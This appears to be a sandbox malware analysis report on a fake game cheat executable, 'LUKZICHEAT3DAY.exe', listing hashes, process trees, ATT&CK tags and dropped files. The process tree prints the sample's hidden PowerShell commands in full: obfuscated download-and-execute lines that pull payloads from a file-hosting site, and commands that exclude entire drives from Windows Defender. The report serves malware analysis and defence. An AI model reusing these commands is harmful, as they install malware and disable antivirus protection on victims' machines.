4ce6de7deccb1a06aa6a77ed6efca36fa9bf9dd9a83fa390b011cbba6dc61fc1

Analysis

max time kernel
21s
max time network
19s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
05/03/2025, 22:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LUKZICHEAT3DAY.exe
Size

20.3MB
MD5

69d03c7e2b083db3e8cccad7c2a74a53
SHA1

7bad6b251222991bb5b91bf688ee9d2a4d57db0b
SHA256

4ce6de7deccb1a06aa6a77ed6efca36fa9bf9dd9a83fa390b011cbba6dc61fc1
SHA512

192befdb4d19881848c4b3d560363e828fc579859bcc8db9d84836c0adfeec05205660114129bc897ed13129a81878b74e06a70657f4b7a1fb8f3e560cbc679f
SSDEEP

393216:gUHyrS/7hf6ETSBHwD3xAk/yzmAhy7M3WzkQYFKyOkgoPY25a5Xt8eox7F1GYVAw:gUHyUhf9TWexVPAhy7MWk5ngiY2MJoxJ

Score

8^/10

execution pyinstaller

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2160	powershell.exe
1604	powershell.exe
2664	powershell.exe
2888	powershell.exe
1808	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
2924	LUKZI CHEAT 3 DAY.exe
2788	LUKZI CHEAT 3 DAY.exe
1244	Process not Found

Loads dropped DLL 8 IoCs

pid	Process
1996	LUKZICHEAT3DAY.exe
2788	LUKZI CHEAT 3 DAY.exe
2788	LUKZI CHEAT 3 DAY.exe
2788	LUKZI CHEAT 3 DAY.exe
2788	LUKZI CHEAT 3 DAY.exe
2788	LUKZI CHEAT 3 DAY.exe
2788	LUKZI CHEAT 3 DAY.exe
2788	LUKZI CHEAT 3 DAY.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x00070000000120fc-4.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2160	powershell.exe
1604	powershell.exe
2664	powershell.exe
2888	powershell.exe
1808	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeDebugPrivilege	2888	powershell.exe
Token: SeDebugPrivilege	1808	powershell.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 1996 wrote to memory of 2924	1996	LUKZICHEAT3DAY.exe	29
PID 1996 wrote to memory of 2924	1996	LUKZICHEAT3DAY.exe	29
PID 1996 wrote to memory of 2924	1996	LUKZICHEAT3DAY.exe	29
PID 1996 wrote to memory of 2940	1996	LUKZICHEAT3DAY.exe	30
PID 1996 wrote to memory of 2940	1996	LUKZICHEAT3DAY.exe	30
PID 1996 wrote to memory of 2940	1996	LUKZICHEAT3DAY.exe	30
PID 2940 wrote to memory of 2160	2940	cmd.exe	32
PID 2940 wrote to memory of 2160	2940	cmd.exe	32
PID 2940 wrote to memory of 2160	2940	cmd.exe	32
PID 2940 wrote to memory of 2124	2940	cmd.exe	33
PID 2940 wrote to memory of 2124	2940	cmd.exe	33
PID 2940 wrote to memory of 2124	2940	cmd.exe	33
PID 2124 wrote to memory of 1428	2124	cmd.exe	34
PID 2124 wrote to memory of 1428	2124	cmd.exe	34
PID 2124 wrote to memory of 1428	2124	cmd.exe	34
PID 2124 wrote to memory of 1720	2124	cmd.exe	35
PID 2124 wrote to memory of 1720	2124	cmd.exe	35
PID 2124 wrote to memory of 1720	2124	cmd.exe	35
PID 2940 wrote to memory of 1604	2940	cmd.exe	36
PID 2940 wrote to memory of 1604	2940	cmd.exe	36
PID 2940 wrote to memory of 1604	2940	cmd.exe	36
PID 2924 wrote to memory of 2788	2924	LUKZI CHEAT 3 DAY.exe	37
PID 2924 wrote to memory of 2788	2924	LUKZI CHEAT 3 DAY.exe	37
PID 2924 wrote to memory of 2788	2924	LUKZI CHEAT 3 DAY.exe	37
PID 2940 wrote to memory of 2664	2940	cmd.exe	38
PID 2940 wrote to memory of 2664	2940	cmd.exe	38
PID 2940 wrote to memory of 2664	2940	cmd.exe	38
PID 2940 wrote to memory of 2888	2940	cmd.exe	39
PID 2940 wrote to memory of 2888	2940	cmd.exe	39
PID 2940 wrote to memory of 2888	2940	cmd.exe	39
PID 2940 wrote to memory of 1808	2940	cmd.exe	40
PID 2940 wrote to memory of 1808	2940	cmd.exe	40
PID 2940 wrote to memory of 1808	2940	cmd.exe	40

C:\Users\Admin\AppData\Local\Temp\LUKZICHEAT3DAY.exe
"C:\Users\Admin\AppData\Local\Temp\LUKZICHEAT3DAY.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1996
- C:\Users\Admin\LUKZI CHEAT 3 DAY.exe
  "C:\Users\Admin\LUKZI CHEAT 3 DAY.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2924
- - C:\Users\Admin\LUKZI CHEAT 3 DAY.exe
    "C:\Users\Admin\LUKZI CHEAT 3 DAY.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2788
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\Anti Crash.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -WindowStyle Hidden -Command "$codes = 104,116,116,112,115,58,47,47,102,105,108,101,115,46,99,97,116,98,111,120,46,109,111,101,47,99,122,49,50,57,114,46,48,48,69,113,113;irm $([Text.Encoding]::ASCII.GetString(@($codes))) | iex"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mountvol | find ":\"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2124
  - - C:\Windows\system32\mountvol.exe
      mountvol
      4⤵
      PID:1428
  - - C:\Windows\system32\find.exe
      find ":\"
      4⤵
      PID:1720
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c add-mppreference -exclusionpath C:\
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c add-mppreference -exclusionpath F:\
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c add-mppreference -exclusionpath D:\
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$url = @();$url += 'h';$url += 't';$url += 't';$url += 'p';$url += 's';$url += ':';$url += '/';$url += '/';$url += 'f';$url += 'i';$url += 'l';$url += 'e';$url += 's';$url += '.';$url += 'c';$url += 'a';$url += 't';$url += 'b';$url += 'o';$url += 'x';$url += '.';$url += 'm';$url += 'o';$url += 'e';$url += '/';$url += '3';$url += 'b';$url += 'f';$url += 'w';$url += 's';$url += 'd';$url += '.';$url += 'G';$url += 'P';$url += '7';$url += 'B';$url += 'f';$url = $url -join '';$output = \"$env:PUBLIC\winglog32.exe\";$output2 = \"$env:PUBLIC\winglog64.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Anti Crash.bat

Filesize
1KB

MD5
fca62c8c6184734af5d14b0986fe7c4a

SHA1
8d297379c9cd283218428028a1f4beb932e6893c

SHA256
1ae972c5ab04e6ca4b1252645363e2fccf23a844c480f064274cf8bebce743ea

SHA512
811bd729b8bb1b6563baad8974dc54e45d4870d462c9d64a928faf252fb8eef9d95c69814ac3a1c6a00208b79f82b982c2475725ef8d80ebcd7b76aedb273088

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29242\api-ms-win-core-file-l2-1-0.dll

Filesize
20KB

MD5
50abf0a7ee67f00f247bada185a7661c

SHA1
0cddac9ac4db3bf10a11d4b79085ef9cb3fb84a1

SHA256
f957a4c261506484b53534a9be8931c02ec1a349b3f431a858f8215cecfec3f7

SHA512
c2694bb5d103baff1264926a04d2f0fe156b8815a23c3748412a81cc307b71a9236a0e974b5549321014065e393d10228a0f0004df9ba677f03b5d244a64b528

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29242\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
f5716e905c45e27ab2bcde0f962c22be

SHA1
72a196c93f43d00da7791c9bc6334a93dc8c6e16

SHA256
f0384cdc9015ccf808b27d89aab47ff62d77701f9d8ef96096a1b213204ef41d

SHA512
fe43857608600f8a3450f52f5b4f6a69ee0edcafe26440257d064bc434aaf3f2d3be581a3b3985e45dc1919adfa438369f64b8f91d962d210cc2ab0b51f74c4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29242\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
ab3986b27d4f6eb2b304c20a424e5ea5

SHA1
5f7f012acb02fb1606d0c0dffd0f1cc88276b340

SHA256
840d6953082758031ed604853447bdd3509b1e21bf80a30355db45f52a367c43

SHA512
9f5918baf2f8f0997728c8d3242f2ffffaf06eb34e34e9f100aca396ab80611e42f77a163db2dbf27aa7755647d260f6a2529efed66d1c5b4278b7a4aa0692e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29242\api-ms-win-core-timezone-l1-1-0.dll

Filesize
21KB

MD5
a776cc5105fd23c1fc68a122c8607def

SHA1
5b7b7defe72d9a2c3209a96430d62fe09e007689

SHA256
b34171187edcdb6c3700919ac791b0ac9762058e7b5268d1b44e7428d06585cf

SHA512
4b1f6b376428903751f046ade693808423306e8fb5925119751439320ba1afb6a50b097864cb436a7f704468af0d68458bcd354ebb8852e01bafde0cf9b9d264

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29242\python313.dll

Filesize
5.8MB

MD5
501080884bed38cb8801a307c9d7b7b4

SHA1
881b250cc8f4fa4f75111ac557a4fde8e1e217af

SHA256
bf68cf819a1e865170430c10e91c18b427aef88db1da1742020443864aa2b749

SHA512
63d74a4871d1c72c2a79ae8a5d380070f9d2128c16949c3ad36c9862fcc4dab738137ed3d51caf0bc46b36655f8bd8a2d425d68200123415ee8d4de0e1cbebc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\INSTALLER

Filesize
4B

MD5
365c9bfeb7d89244f2ce01c1de44cb85

SHA1
d7a03141d5d6b1e88b6b59ef08b6681df212c599

SHA256
ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508

SHA512
d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29242\ucrtbase.dll

Filesize
1.1MB

MD5
3b337c2d41069b0a1e43e30f891c3813

SHA1
ebee2827b5cb153cbbb51c9718da1549fa80fc5c

SHA256
c04daeba7e7c4b711d33993ab4c51a2e087f98f4211aea0dcb3a216656ba0ab7

SHA512
fdb3012a71221447b35757ed2bdca6ed1f8833b2f81d03aabebd2cd7780a33a9c3d816535d03c5c3edd5aaf11d91156842b380e2a63135e3c7f87193ad211499

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0LFMWBOW9XQ9G8JR5DCK.temp

Filesize
7KB

MD5
8dd92eb482218df1064abcd0c59df670

SHA1
322e70d03dbd9bd560e96097c5cffda6ffbf7cd6

SHA256
255f02f53ed5aba85a18cc6829e6838217f90289d9305cf5662860495aea6df9

SHA512
13ef2fb62e874dab706db2a3dc660f7d331bbb2a29b05d5cc39a4f22d67cf91d29541bb4cfcd30a94f6c516e85af20419c4aa6955c3092637dcc47b0e08faa8e

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI29242\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
33f2eeb40f245d3114df277f00d3160c

SHA1
54ebdde675d1f921988a404deef6c52bcfd5ac9d

SHA256
12bce3364b96571e89a8bec10ecaa3131959b40d2f6a8bec13086919020ee054

SHA512
4ef5653c3f781f0d7b999c89a48172cd8c4321cb54f3cf4aa9f0c116821f328e408f8bc91fb051723a813f6c3c8c16f2944fef5bf4a7e016898ae8bd994ab9ce

Download Submit
\Users\Admin\LUKZI CHEAT 3 DAY.exe

Filesize
20.3MB

MD5
68e7d44d81007df6809fc47271e9edbe

SHA1
cec3df2cda200ee8cee25a9b5f4f7acd98df3a74

SHA256
12795cf419c375dafb275127c073f22e02490c849c211286fba1559b4c6788a1

SHA512
0836f79571d77f80b9bae24a2312d0dd96ad52d69f5e25dcde19542ba79ac492be4f1128e1fabdc1ddf9af89176749735990466ca46998e82358dad319a8749b

Download Submit
memory/1604-1109-0x000000001B250000-0x000000001B532000-memory.dmp

Filesize
2.9MB

Download
memory/1604-1110-0x0000000002490000-0x0000000002498000-memory.dmp

Filesize
32KB

Download
memory/1996-0-0x000007FEF5DE3000-0x000007FEF5DE4000-memory.dmp

Filesize
4KB

Download
memory/1996-1-0x0000000000860000-0x0000000001CAC000-memory.dmp

Filesize
20.3MB

Download
memory/2160-905-0x00000000022F0000-0x00000000022F8000-memory.dmp

Filesize
32KB

Download
memory/2160-881-0x000000001B450000-0x000000001B732000-memory.dmp

Filesize
2.9MB

Download